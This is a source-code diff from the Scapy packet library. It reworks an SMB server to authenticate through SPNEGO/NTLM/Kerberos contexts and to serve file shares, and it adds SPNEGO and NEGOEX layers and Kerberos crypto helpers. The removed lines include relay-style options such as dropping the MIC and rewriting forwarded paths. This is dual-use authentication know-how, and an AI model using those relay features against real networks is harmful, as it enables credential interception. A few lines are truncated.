resp.SecurityBlob.innerContextToken.token.mechTypes.insert( - 0, - # NEGOEX - SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.30"), - ) - resp.SecurityBlob.innerContextToken.token.mechToken = SPNEGO_Token( - value=negoex_token - ) # noqa: E501 + resp.SecurityBlob = spnego_token else: # Non-extended SMB1 - resp.Challenge = self.get("Challenge") - resp.DomainName = self.get("DomainName") - resp.ServerName = self.get("ServerName") + # FIXME never tested. + resp.SecurityBlob = spnego_token resp.Flags2 -= "EXTENDED_SECURITY" if not self.SMB2: resp[SMB_Header].Flags2 = ( - resp[SMB_Header].Flags2 - - "SMB_SECURITY_SIGNATURE" + - "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" + resp[SMB_Header].Flags2 + - "SMB_SECURITY_SIGNATURE" + + "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" + ) + if self.Dialect and self.Dialect >= 0x0311: # SMB 3.1.1 only + # [MS-SMB2] 3.3.5.4 + # TODO: handle SMB2_SESSION_FLAG_BINDING + # Calculate the *Connection* PreauthIntegrityHashValue + self.ConnectionPreauthIntegrityHashValue = ( + SMB2computePreauthIntegrityHashValue( + b"\x00" * 64, + bytes(pkt[SMB2_Header]), # nego request + HashId=self.PreauthIntegrityHashId, + ) + ) + self.ConnectionPreauthIntegrityHashValue = ( + SMB2computePreauthIntegrityHashValue( + self.ConnectionPreauthIntegrityHashValue, + bytes(resp[SMB2_Header]), # nego response + HashId=self.PreauthIntegrityHashId, + ) ) self.send(resp) @@ -260,6 +631,25 @@ def NEGOTIATED(self): pass def update_smbheader(self, pkt): + """ + Called when receiving a SMB2 packet to update the current smb_header + """ + # [MS-SMB2] sect 3.2.5.1.4 - always grant client its credits + self.smb_header.CreditRequest = pkt.CreditRequest + # If the packet has a NextCommand, set NextCompound to True + self.NextCompound = bool(pkt.NextCommand) + # [MS-SMB2] sect 3.3.5.2.7.2 + # Add SMB2_FLAGS_RELATED_OPERATIONS to the response if present + if pkt.Flags.SMB2_FLAGS_RELATED_OPERATIONS: + self.smb_header.Flags += "SMB2_FLAGS_RELATED_OPERATIONS" + else: + self.smb_header.Flags -= "SMB2_FLAGS_RELATED_OPERATIONS" + # [MS-SMB2] sect 2.2.1.2 - Priority + if self.Dialect and self.Dialect >= 0x0311: + self.smb_header.Flags &= 0xFF8F + self.smb_header.Flags |= int(pkt.Flags) & 0x70 + # Update IDs + self.smb_header.SessionId = pkt.SessionId self.smb_header.TID = pkt.TID self.smb_header.MID = pkt.MID self.smb_header.PID = pkt.PID @@ -276,145 +666,123 @@ def on_negotiate_smb2(self, pkt): @ATMT.receive_condition(NEGOTIATED) def receive_setup_andx_request(self, pkt): if ( - SMBSession_Setup_AndX_Request_Extended_Security in pkt or - SMBSession_Setup_AndX_Request in pkt + SMBSession_Setup_AndX_Request_Extended_Security in pkt + or SMBSession_Setup_AndX_Request in pkt ): # SMB1 if SMBSession_Setup_AndX_Request_Extended_Security in pkt: # Extended - ntlm_tuple = self._get_token(pkt.SecurityBlob) + ssp_blob = pkt.SecurityBlob else: # Non-extended - self.set_cli("AccountName", pkt.AccountName) - self.set_cli("PrimaryDomain", pkt.PrimaryDomain) - self.set_cli("Path", pkt.Path) - self.set_cli("Service", pkt.Service) - ntlm_tuple = self._get_token( - pkt[SMBSession_Setup_AndX_Request].UnicodePassword - ) - self.set_cli("VCNumber", pkt.VCNumber) - self.set_cli("SecuritySignature", pkt.SecuritySignature) - self.set_cli("UID", pkt.UID) - self.set_cli("MID", pkt.MID) - self.set_cli("TID", pkt.TID) - self.received_ntlm_token(ntlm_tuple) - raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) + ssp_blob = pkt[SMBSession_Setup_AndX_Request].UnicodePassword + raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt, ssp_blob) elif SMB2_Session_Setup_Request in pkt: # SMB2 - ntlm_tuple = self._get_token(pkt.SecurityBlob) - self.set_cli("SecuritySignature", pkt.SecuritySignature) - self.set_cli("MID", pkt.MID) - self.set_cli("TID", pkt.TID) - self.set_cli("AsyncId", pkt.AsyncId) - self.set_cli("SessionId", pkt.SessionId) - self.set_cli("SecurityMode", pkt.SecurityMode) - self.received_ntlm_token(ntlm_tuple) - raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) + ssp_blob = pkt.SecurityBlob + raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt, ssp_blob) @ATMT.state() def RECEIVED_SETUP_ANDX_REQUEST(self): pass @ATMT.action(receive_setup_andx_request) - def on_setup_andx_request(self, pkt): - ntlm_token, negResult, MIC, rawToken = ntlm_tuple = self.get_token() - # rawToken == whether the GSSAPI ASN.1 wrapper is used - # typically, when a SMB session **falls back** to NTLM, no - # wrapper is used - if ( - SMBSession_Setup_AndX_Request_Extended_Security in pkt or - SMBSession_Setup_AndX_Request in pkt or - SMB2_Session_Setup_Request in pkt - ): + def on_setup_andx_request(self, pkt, ssp_blob): + self.sspcontext, tok, status = self.ssp.GSS_Accept_sec_context( + self.sspcontext, ssp_blob + ) + self.update_smbheader(pkt) + if SMB2_Session_Setup_Request in pkt: + # SMB2 + self.smb_header.SessionId = 0x0001000000000015 + if status not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: + # Error if SMB2_Session_Setup_Request in pkt: # SMB2 - self.smb_header.MID = self.get("MID", self.smb_header.MID + 1) - self.smb_header.TID = self.get("TID", self.smb_header.TID) - if self.smb_header.Flags.SMB2_FLAGS_ASYNC_COMMAND: - self.smb_header.AsyncId = self.get( - "AsyncId", self.smb_header.AsyncId - ) - self.smb_header.SessionId = self.get("SessionId", 0x0001000000000015) + resp = self.smb_header.copy() / SMB2_Session_Setup_Response() + # Set security blob (if any) + resp.SecurityBlob = tok else: # SMB1 - self.smb_header.UID = self.get("UID") - self.smb_header.MID = self.get("MID") - self.smb_header.TID = self.get("TID") - if ntlm_tuple == (None, None, None, None): - # Error + resp = self.smb_header.copy() / SMBSession_Null() + # Map some GSS return codes to NTStatus + if status == GSS_S_CREDENTIALS_EXPIRED: + resp.Status = "STATUS_PASSWORD_EXPIRED" + else: + resp.Status = "STATUS_LOGON_FAILURE" + # Reset Session preauth (SMB 3.1.1) + self.SessionPreauthIntegrityHashValue = None + else: + # Negotiation + if ( + SMBSession_Setup_AndX_Request_Extended_Security in pkt + or SMB2_Session_Setup_Request in pkt + ): + # SMB1 extended / SMB2 if SMB2_Session_Setup_Request in pkt: # SMB2 resp = self.smb_header.copy() / SMB2_Session_Setup_Response() + if self.GUEST_LOGIN: + resp.SessionFlags = "IS_GUEST" + if self.ANONYMOUS_LOGIN: + resp.SessionFlags = "IS_NULL" else: - # SMB1 - resp = self.smb_header.copy() / SMBSession_Null() - resp.Status = self.get("Status", 0xC000006D) - else: - # Negotiation - if ( - SMBSession_Setup_AndX_Request_Extended_Security in pkt or - SMB2_Session_Setup_Request in pkt - ): - # SMB1 extended / SMB2 - if SMB2_Session_Setup_Request in pkt: - # SMB2 - resp = self.smb_header.copy() / SMB2_Session_Setup_Response() - if self.GUEST_LOGIN: - resp.SessionFlags = "IS_GUEST" - if self.ANONYMOUS_LOGIN: - resp.SessionFlags = "IS_NULL" - else: - # SMB1 extended - resp = ( - self.smb_header.copy() / - SMBSession_Setup_AndX_Response_Extended_Security( - NativeOS=self.get("NativeOS"), - NativeLanMan=self.get("NativeLanMan"), - ) - ) - if self.GUEST_LOGIN: - resp.Action = "SMB_SETUP_GUEST" - if not ntlm_token: - # No token (e.g. accepted) - resp.SecurityBlob = SPNEGO_negToken( - token=SPNEGO_negTokenResp( - negResult=negResult, - ) + # SMB1 extended + resp = ( + self.smb_header.copy() + / SMBSession_Setup_AndX_Response_Extended_Security( + NativeOS="Windows 4.0", + NativeLanMan="Windows 4.0", ) - if MIC and not self.DROP_MIC: # Drop the MIC? - resp.SecurityBlob.token.mechListMIC = SPNEGO_MechListMIC( - value=MIC - ) # noqa: E501 - if negResult == 0: - self.authenticated = True - elif isinstance(ntlm_token, NTLM_CHALLENGE) and not rawToken: - resp.SecurityBlob = SPNEGO_negToken( - token=SPNEGO_negTokenResp( - negResult=negResult or 1, - supportedMech=SPNEGO_MechType( - # NTLMSSP - oid="1.3.6.1.4.1.311.2.2.10" - ), - responseToken=SPNEGO_Token(value=ntlm_token), - ) - ) - else: - # Token is raw or unknown - resp.SecurityBlob = ntlm_token - elif SMBSession_Setup_AndX_Request in pkt: - # Non-extended - resp = self.smb_header.copy() / SMBSession_Setup_AndX_Response( - NativeOS=self.get("NativeOS"), - NativeLanMan=self.get("NativeLanMan"), ) - resp.Status = self.get( - "Status", 0x0 if self.authenticated else 0xC0000016 + if self.GUEST_LOGIN: + resp.Action = "SMB_SETUP_GUEST" + # Set security blob + resp.SecurityBlob = tok + elif SMBSession_Setup_AndX_Request in pkt: + # Non-extended + resp = self.smb_header.copy() / SMBSession_Setup_AndX_Response( + NativeOS="Windows 4.0", + NativeLanMan="Windows 4.0", ) + resp.Status = 0x0 if (status == GSS_S_COMPLETE) else 0xC0000016 + # We have a response. If required, compute sessions + if self.Dialect and self.Dialect >= 0x0311: # SMB 3.1.1 only + # [MS-SMB2] 3.3.5.5.3 + if self.SessionPreauthIntegrityHashValue is None: + # New auth or failure + self.SessionPreauthIntegrityHashValue = ( + self.ConnectionPreauthIntegrityHashValue + ) + # Calculate the *Session* PreauthIntegrityHashValue + self.SessionPreauthIntegrityHashValue = ( + SMB2computePreauthIntegrityHashValue( + self.SessionPreauthIntegrityHashValue, + bytes(pkt[SMB2_Header]), # session setup request + HashId=self.PreauthIntegrityHashId, + ) + ) + if status == GSS_S_CONTINUE_NEEDED: # continue + self.SessionPreauthIntegrityHashValue = ( + SMB2computePreauthIntegrityHashValue( + self.SessionPreauthIntegrityHashValue, + bytes(resp[SMB2_Header]), # session setup response + HashId=self.PreauthIntegrityHashId, + ) + ) + if status == GSS_S_COMPLETE: + # Authentication was successful + self.computeSMBSessionKey() + self.authenticated = True + # and send self.send(resp) @ATMT.condition(RECEIVED_SETUP_ANDX_REQUEST) def wait_for_next_request(self): if self.authenticated: + self.vprint( + "User authenticated %s!" % (self.GUEST_LOGIN and " as guest" or "") + ) raise self.AUTHENTICATED() else: raise self.NEGOTIATED() @@ -424,16 +792,17 @@ def AUTHENTICATED(self): """Dev: overload this""" pass - @ATMT.condition(AUTHENTICATED, prio=1) - def should_end(self): - if not self.ECHO: - # Close connection - raise self.END() + # DEV: add a condition on AUTHENTICATED with prio=0 - @ATMT.receive_condition(AUTHENTICATED, prio=2) - def receive_packet_echo(self, pkt): - if self.ECHO: - raise self.AUTHENTICATED().action_parameters(pkt) + @ATMT.condition(AUTHENTICATED, prio=1) + def should_serve(self): + # Serve files + self.current_trees = {} + self.current_handles = {} + self.enumerate_index = {} # used for query directory enumeration + self.tree_id = 0 + self.base_time_t = self.current_smb_time() + raise self.SERVING() def _ioctl_error(self, Status="STATUS_NOT_SUPPORTED"): pkt = self.smb_header.copy() / SMB2_Error_Response(ErrorData=b"\xff") @@ -441,63 +810,937 @@ def _ioctl_error(self, Status="STATUS_NOT_SUPPORTED"): pkt.Command = "SMB2_IOCTL" self.send(pkt) - @ATMT.action(receive_packet_echo) - def pass_packet(self, pkt): - # Pre-process some of the data if possible - pkt.show() - if not self.SMB2: - # SMB1 - no signature (disabled by our implementation) - if SMBTree_Connect_AndX in pkt and self.REAL_HOSTNAME: - pkt.LENGTH = None - pkt.ByteCount = None - pkt.Path = ( - "\\\\%s\\" % self.REAL_HOSTNAME + pkt.Path[2:].split("\\", 1)[1] + @ATMT.state(final=1) + def END(self): + self.end() + + # SERVE FILES + + def current_tree(self): + """ + Return the current tree name + """ + return self.current_trees[self.smb_header.TID] + + def root_path(self): + """ + Return the root path of the current tree + """ + curtree = self.current_tree() + try: + share_path = next(x.path for x in self.shares if x._name == curtree.lower()) + except StopIteration: + return None + return pathlib.Path(share_path).resolve() + + @ATMT.state() + def SERVING(self): + """ + Main state when serving files + """ + pass + + @ATMT.receive_condition(SERVING) + def receive_logoff_request(self, pkt): + if SMB2_Session_Logoff_Request in pkt: + raise self.NEGOTIATED().action_parameters(pkt) + + @ATMT.action(receive_logoff_request) + def send_logoff_response(self, pkt): + self.update_smbheader(pkt) + self.send(self.smb_header.copy() / SMB2_Session_Logoff_Response()) + + @ATMT.receive_condition(SERVING) + def receive_setup_andx_request_in_serving(self, pkt): + self.receive_setup_andx_request(pkt) + + @ATMT.receive_condition(SERVING) + def is_smb1_tree(self, pkt): + if SMBTree_Connect_AndX in pkt: + # Unsupported + log_runtime.warning("Tree request in SMB1: unimplemented. Quit") + raise self.END() + + @ATMT.receive_condition(SERVING) + def receive_tree_connect(self, pkt): + if SMB2_Tree_Connect_Request in pkt: + tree_name = pkt[SMB2_Tree_Connect_Request].Path.split("\\")[-1] + raise self.SERVING().action_parameters(pkt, tree_name) + + @ATMT.action(receive_tree_connect) + def send_tree_connect_response(self, pkt, tree_name): + self.update_smbheader(pkt) + # Check the tree name against the shares we're serving + if not any(x._name == tree_name.lower() for x in self.shares): + # Unknown tree + resp = self.smb_header.copy() / SMB2_Error_Response() + resp.Command = "SMB2_TREE_CONNECT" + resp.Status = "STATUS_BAD_NETWORK_NAME" + self.send(resp) + return + # Add tree to current trees + if tree_name not in self.current_trees: + self.tree_id += 1 + self.smb_header.TID = self.tree_id + self.current_trees[self.smb_header.TID] = tree_name + self.vprint("Tree Connect on: %s" % tree_name) + self.send( + self.smb_header + / SMB2_Tree_Connect_Response( + ShareType="PIPE" if self.current_tree() == "IPC$" else "DISK", + ShareFlags="AUTO_CACHING+NO_CACHING" + if self.current_tree() == "IPC$" + else self.TREE_SHARE_FLAGS, + Capabilities=0 + if self.current_tree() == "IPC$" + else self.TREE_CAPABILITIES, + MaximalAccess=self.TREE_MAXIMAL_ACCESS, + ) + ) + + @ATMT.receive_condition(SERVING) + def receive_ioctl(self, pkt): + if SMB2_IOCTL_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_ioctl) + def send_ioctl_response(self, pkt): + self.update_smbheader(pkt) + if pkt.CtlCode == 0x11C017: + # FSCTL_PIPE_TRANSCEIVE + self.rpc_server.recv(pkt.Input.load) + self.send( + self.smb_header.copy() + / SMB2_IOCTL_Response( + CtlCode=0x11C017, + FileId=pkt[SMB2_IOCTL_Request].FileId, + Buffer=[("Output", self.rpc_server.get_response())], ) - else: - self.smb_header.MID += 1 - # SMB2 - if SMB2_IOCTL_Request in pkt and pkt.CtlCode == 0x00140204: - # FSCTL_VALIDATE_NEGOTIATE_INFO - # This is a security measure asking the server to validate - # what flags were negotiated during the SMBNegotiate exchange. - # This packet is ALWAYS signed, and expects a signed response. - - # https://docs.microsoft.com/en-us/archive/blogs/openspecification/smb3-secure-dialect-negotiation - # > "Down-level servers (pre-Windows 2012) will return - # > STATUS_NOT_SUPPORTED or STATUS_INVALID_DEVICE_REQUEST - # > since they do not allow or implement - # > FSCTL_VALIDATE_NEGOTIATE_INFO. - # > The client should accept the - # > response provided it's properly signed". - - if self.SigningSessionKey: - # We have the session key ! - pkt = self.smb_header.copy() / SMB2_IOCTL_Response( - CtlCode=0x00140204, + ) + elif pkt.CtlCode == 0x00140204 and self.sspcontext.SessionKey: + # FSCTL_VALIDATE_NEGOTIATE_INFO + # This is a security measure asking the server to validate + # what flags were negotiated during the SMBNegotiate exchange. + # This packet is ALWAYS signed, and expects a signed response. + + # https://docs.microsoft.com/en-us/archive/blogs/openspecification/smb3-secure-dialect-negotiation + # > "Down-level servers (pre-Windows 2012) will return + # > STATUS_NOT_SUPPORTED or STATUS_INVALID_DEVICE_REQUEST + # > since they do not allow or implement + # > FSCTL_VALIDATE_NEGOTIATE_INFO. + # > The client should accept the + # > response provided it's properly signed". + + if not self.Dialect or self.Dialect < 0x0300: + # SMB < 3 isn't supposed to support FSCTL_VALIDATE_NEGOTIATE_INFO + self._ioctl_error(Status="STATUS_FILE_CLOSED") + return + + # SMB3 + self.send( + self.smb_header.copy() + / SMB2_IOCTL_Response( + CtlCode=0x00140204, + FileId=pkt[SMB2_IOCTL_Request].FileId, + Buffer=[ + ( + "Output", + SMB2_IOCTL_Validate_Negotiate_Info_Response( + GUID=self.GUID, + DialectRevision=self.Dialect, + SecurityMode=self.SecurityMode, + Capabilities=self.NegotiateCapabilities, + ), + ) + ], + ) + ) + elif pkt.CtlCode == 0x001401FC: + # FSCTL_QUERY_NETWORK_INTERFACE_INFO + self.send( + self.smb_header.copy() + / SMB2_IOCTL_Response( + CtlCode=0x001401FC, + FileId=pkt[SMB2_IOCTL_Request].FileId, + Output=SMB2_IOCTL_Network_Interface_Info( + interfaces=[ + NETWORK_INTERFACE_INFO( + SockAddr_Storage=SOCKADDR_STORAGE( + Family=0x0002, + IPv4Adddress=x, + ) + ) + for x in self.LOCAL_IPS + ] + ), + ) + ) + elif pkt.CtlCode == 0x00060194: + # FSCTL_DFS_GET_REFERRALS + if ( + self.DOMAIN_REFERRALS + and not pkt[SMB2_IOCTL_Request].Input.RequestFileName + ): + # Requesting domain referrals + self.send( + self.smb_header.copy() + / SMB2_IOCTL_Response( + CtlCode=0x00060194, FileId=pkt[SMB2_IOCTL_Request].FileId, - Buffer=[ - ( - "Output", - SMB2_IOCTL_Validate_Negotiate_Info_Response( - GUID=self.GUID, - DialectRevision=self.Dialect, - SecurityMode=3 - if self.REQUIRE_SIGNATURE - else self.get( - "SecurityMode", bool(self.IDENTITIES) - ), + Output=SMB2_IOCTL_RESP_GET_DFS_Referral( + ReferralEntries=[ + DFS_REFERRAL_V3( + ReferralEntryFlags="NameListReferral", + TimeToLive=600, + ) + for _ in self.DOMAIN_REFERRALS + ], + ReferralBuffer=[ + DFS_REFERRAL_ENTRY1(SpecialName=name) + for name in self.DOMAIN_REFERRALS + ], + ), + ) + ) + return + resp = self.smb_header.copy() / SMB2_Error_Response() + resp.Command = "SMB2_IOCTL" + resp.Status = "STATUS_FS_DRIVER_REQUIRED" + self.send(resp) + else: + # Among other things, FSCTL_VALIDATE_NEGOTIATE_INFO + self._ioctl_error(Status="STATUS_NOT_SUPPORTED") + + @ATMT.receive_condition(SERVING) + def receive_create_file(self, pkt): + if SMB2_Create_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + PIPES_TABLE = { + "srvsvc": SMB2_FILEID(Persistent=0x4000000012, Volatile=0x4000000001), + "wkssvc": SMB2_FILEID(Persistent=0x4000000013, Volatile=0x4000000002), + "NETLOGON": SMB2_FILEID(Persistent=0x4000000014, Volatile=0x4000000003), + } + + # special handle in case of compounded requests ([MS-SMB2] 3.2.4.1.4) + # that points to the chained opened file handle + LAST_HANDLE = SMB2_FILEID( + Persistent=0xFFFFFFFFFFFFFFFF, Volatile=0xFFFFFFFFFFFFFFFF + ) + + def current_smb_time(self): + return ( + FileNetworkOpenInformation().get_field("CreationTime").i2m(None, None) + - 864000000000 # one day ago + ) + + def make_file_id(self, fname): + """ + Generate deterministic FileId based on the fname + """ + hash = hashlib.md5((fname or "").encode()).digest() + return 0x4000000000 | struct.unpack("= 2: + log_runtime.info("-- Scapy %s SMB Server --" % conf.version) + log_runtime.info( + "SSP: %s. Serving %s shares:" + % ( + conf.color_theme.yellow(ssp or "NTLM (guest)"), + conf.color_theme.red(len(shares)), + ) + ) + for share in shares: + log_runtime.info(" * %s" % share) + # Start SMB Server + self.srv = SMB_Server.spawn( + # TCP server + port=port, + iface=iface or conf.loopback_name, + verb=verb, + # SMB server + ssp=ssp, + shares=shares, + # SMB arguments + **kwargs, + ) + + def close(self): + """ + Close the smbserver if started in background mode (bg=True) + """ + if self.srv: + self.srv.shutdown(socket.SHUT_RDWR) + self.srv.close() diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py new file mode 100644 index 00000000000..67948c4d611 --- /dev/null +++ b/scapy/layers/spnego.py @@ -0,0 +1,852 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +SPNEGO + +Implements parts of +- GSSAPI SPNEGO: RFC4178 > RFC2478 +- GSSAPI SPNEGO NEGOEX: [MS-NEGOEX] +""" + +import struct +from uuid import UUID + +from scapy.asn1.asn1 import ( + ASN1_OID, + ASN1_STRING, + ASN1_Codecs, +) +from scapy.asn1.mib import conf # loads conf.mib +from scapy.asn1fields import ( + ASN1F_CHOICE, + ASN1F_ENUMERATED, + ASN1F_FLAGS, + ASN1F_GENERAL_STRING, + ASN1F_OID, + ASN1F_PACKET, + ASN1F_SEQUENCE, + ASN1F_SEQUENCE_OF, + ASN1F_STRING, + ASN1F_optional, +) +from scapy.asn1packet import ASN1_Packet +from scapy.fields import ( + FieldListField, + LEIntEnumField, + LEIntField, + LELongEnumField, + LELongField, + LEShortField, + MultipleTypeField, + PacketField, + PacketListField, + StrFixedLenField, + UUIDEnumField, + UUIDField, + StrField, + XStrFixedLenField, + XStrLenField, +) +from scapy.packet import Packet, bind_layers + +from scapy.layers.gssapi import ( + GSSAPI_BLOB, + GSS_S_COMPLETE, + GSS_S_CONTINUE_NEEDED, + GSS_S_BAD_MECH, + SSP, + _GSSAPI_OIDS, +) + +# SSP Providers +from scapy.layers.kerberos import ( + Kerberos, +) +from scapy.layers.ntlm import ( + NEGOEX_EXCHANGE_NTLM, + NTLM_Header, + _NTLMPayloadField, + _NTLMPayloadPacket, +) + +# Typing imports +from typing import ( + Dict, + Tuple, +) + +# SPNEGO negTokenInit +# https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.1 + + +class SPNEGO_MechType(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_OID("oid", None) + + +class SPNEGO_MechTypes(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF("mechTypes", None, SPNEGO_MechType) + + +class SPNEGO_MechListMIC(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_STRING("value", "") + + +_mechDissector = { + "1.3.6.1.4.1.311.2.2.10": NTLM_Header, # NTLM + "1.2.840.48018.1.2.2": Kerberos, # MS KRB5 - Microsoft Kerberos 5 + "1.2.840.113554.1.2.2": Kerberos, # Kerberos 5 +} + + +class _SPNEGO_Token_Field(ASN1F_STRING): + def i2m(self, pkt, x): + if x is None: + x = b"" + return super(_SPNEGO_Token_Field, self).i2m(pkt, bytes(x)) + + def m2i(self, pkt, s): + dat, r = super(_SPNEGO_Token_Field, self).m2i(pkt, s) + if isinstance(pkt.underlayer, SPNEGO_negTokenInit): + types = pkt.underlayer.mechTypes + elif isinstance(pkt.underlayer, SPNEGO_negTokenResp): + types = [pkt.underlayer.supportedMech] + if types and types[0] and types[0].oid.val in _mechDissector: + return _mechDissector[types[0].oid.val](dat.val), r + return dat, r + + +class SPNEGO_Token(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = _SPNEGO_Token_Field("value", None) + + +_ContextFlags = [ + "delegFlag", + "mutualFlag", + "replayFlag", + "sequenceFlag", + "superseded", + "anonFlag", + "confFlag", + "integFlag", +] + + +class SPNEGO_negHints(ASN1_Packet): + # [MS-SPNG] 2.2.1 + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_GENERAL_STRING( + "hintName", "not_defined_in_RFC4178@please_ignore", explicit_tag=0xA0 + ), + ), + ASN1F_optional( + ASN1F_GENERAL_STRING("hintAddress", None, explicit_tag=0xA1), + ), + ) + + +class SPNEGO_negTokenInit(ASN1_Packet): + # actually it's SPNEGO_negTokenInit2 from [MS-SPNG] 2.2.1 + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_SEQUENCE_OF("mechTypes", None, SPNEGO_MechType, explicit_tag=0xA0) + ), + ASN1F_optional(ASN1F_FLAGS("reqFlags", None, _ContextFlags, implicit_tag=0x81)), + ASN1F_optional( + ASN1F_PACKET("mechToken", None, SPNEGO_Token, explicit_tag=0xA2) + ), + # [MS-SPNG] flavor ! + ASN1F_optional( + ASN1F_PACKET("negHints", None, SPNEGO_negHints, explicit_tag=0xA3) + ), + ASN1F_optional( + ASN1F_PACKET("mechListMIC", None, SPNEGO_MechListMIC, explicit_tag=0xA4) + ), + # Compat with RFC 4178's SPNEGO_negTokenInit + ASN1F_optional( + ASN1F_PACKET("_mechListMIC", None, SPNEGO_MechListMIC, explicit_tag=0xA3) + ), + ) + + +# SPNEGO negTokenTarg +# https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.2 + + +class SPNEGO_negTokenResp(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_ENUMERATED( + "negResult", + 0, + { + 0: "accept-completed", + 1: "accept-incomplete", + 2: "reject", + 3: "request-mic", + }, + explicit_tag=0xA0, + ), + ), + ASN1F_optional( + ASN1F_PACKET( + "supportedMech", SPNEGO_MechType(), SPNEGO_MechType, explicit_tag=0xA1 + ), + ), + ASN1F_optional( + ASN1F_PACKET("responseToken", None, SPNEGO_Token, explicit_tag=0xA2) + ), + ASN1F_optional( + ASN1F_PACKET("mechListMIC", None, SPNEGO_MechListMIC, explicit_tag=0xA3) + ), + ) + + +class SPNEGO_negToken(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "token", + SPNEGO_negTokenInit(), + ASN1F_PACKET( + "negTokenInit", + SPNEGO_negTokenInit(), + SPNEGO_negTokenInit, + explicit_tag=0xA0, + ), + ASN1F_PACKET( + "negTokenResp", + SPNEGO_negTokenResp(), + SPNEGO_negTokenResp, + explicit_tag=0xA1, + ), + ) + + +# Register for the GSS API Blob + +_GSSAPI_OIDS["1.3.6.1.5.5.2"] = SPNEGO_negToken + + +def mechListMIC(oids): + """ + Implementation of RFC 4178 - Appendix D. mechListMIC Computation + """ + return bytes(SPNEGO_MechTypes(mechTypes=oids)) + + +# NEGOEX +# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-negoex/0ad7a003-ab56-4839-a204-b555ca6759a2 + + +_NEGOEX_AUTH_SCHEMES = { + # Reversed. Is there any doc related to this? + # The NEGOEX doc is very ellusive + UUID("5c33530d-eaf9-0d4d-b2ec-4ae3786ec308"): "UUID('[NTLM-UUID]')", +} + + +class NEGOEX_MESSAGE_HEADER(Packet): + fields_desc = [ + StrFixedLenField("Signature", "NEGOEXTS", length=8), + LEIntEnumField( + "MessageType", + 0, + { + 0x0: "INITIATOR_NEGO", + 0x01: "ACCEPTOR_NEGO", + 0x02: "INITIATOR_META_DATA", + 0x03: "ACCEPTOR_META_DATA", + 0x04: "CHALLENGE", + 0x05: "AP_REQUEST", + 0x06: "VERIFY", + 0x07: "ALERT", + }, + ), + LEIntField("SequenceNum", 0), + LEIntField("cbHeaderLength", None), + LEIntField("cbMessageLength", None), + UUIDField("ConversationId", None), + ] + + def post_build(self, pkt, pay): + if self.cbHeaderLength is None: + pkt = pkt[16:] + struct.pack(" bytes + """Util function to build the offset and populate the lengths""" + for field_name, value in self.fields["Payload"]: + length = self.get_field("Payload").fields_map[field_name].i2len(self, value) + count = self.get_field("Payload").fields_map[field_name].i2count(self, value) + offset = fields[field_name] + # Offset + if self.getfieldval(field_name + "BufferOffset") is None: + p = p[:offset] + struct.pack(" bytes + return ( + _NEGOEX_post_build( + self, + pkt, + self.OFFSET, + { + "AuthScheme": 96, + "Extension": 102, + }, + ) + + pay + ) + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 12: + MessageType = struct.unpack(" bytes: + """ + KDF in Counter Mode as section 5.1 of [SP800-108] + + This assumes r=32, and defaults to SHA256 ([MS-SMB2] default). + """ + PRF = Hmac(K_I, hashmod).digest + h = hashmod.hash_len + n = math.ceil(L / h) + if n >= 0xFFFFFFFF: + # 2^r-1 = 0xffffffff with r=32 per [MS-SMB2] + raise ValueError("Invalid n value in SP800108_KDFCTR") + result = b"".join( + PRF(struct.pack(">I", i) + Label + b"\x00" + Context + struct.pack(">I", L)) + for i in range(1, n + 1) ) + return result[: L // 8] + + +# https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml#kerberos-parameters-1 -__all__ = [ - "EncryptionType", - "ChecksumType", - "Key", - "InvalidChecksum", -] +class EncryptionType(enum.IntEnum): + DES_CBC_CRC = 1 + DES_CBC_MD4 = 2 + DES_CBC_MD5 = 3 + # DES3_CBC_SHA1 = 7 + DES3_CBC_SHA1_KD = 16 + AES128_CTS_HMAC_SHA1_96 = 17 + AES256_CTS_HMAC_SHA1_96 = 18 + AES128_CTS_HMAC_SHA256_128 = 19 + AES256_CTS_HMAC_SHA384_192 = 20 + RC4_HMAC = 23 + # RC4_HMAC_EXP = 24 + # CAMELLIA128-CTS-CMAC = 25 + # CAMELLIA256-CTS-CMAC = 26 -class EncryptionType: - DES_CRC = 1 - DES_MD4 = 2 - DES_MD5 = 3 - DES3 = 16 - AES128 = 17 - AES256 = 18 - RC4 = 23 +# https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml#kerberos-parameters-2 -class ChecksumType: + +class ChecksumType(enum.IntEnum): CRC32 = 1 - MD4 = 2 - MD4_DES = 3 - MD5 = 7 - MD5_DES = 8 - SHA1 = 9 - SHA1_DES3 = 12 - SHA1_AES128 = 15 - SHA1_AES256 = 16 + # RSA_MD4 = 2 + RSA_MD4_DES = 3 + # RSA_MD5 = 7 + RSA_MD5_DES = 8 + # RSA_MD5_DES3 = 9 + # SHA1 = 10 + 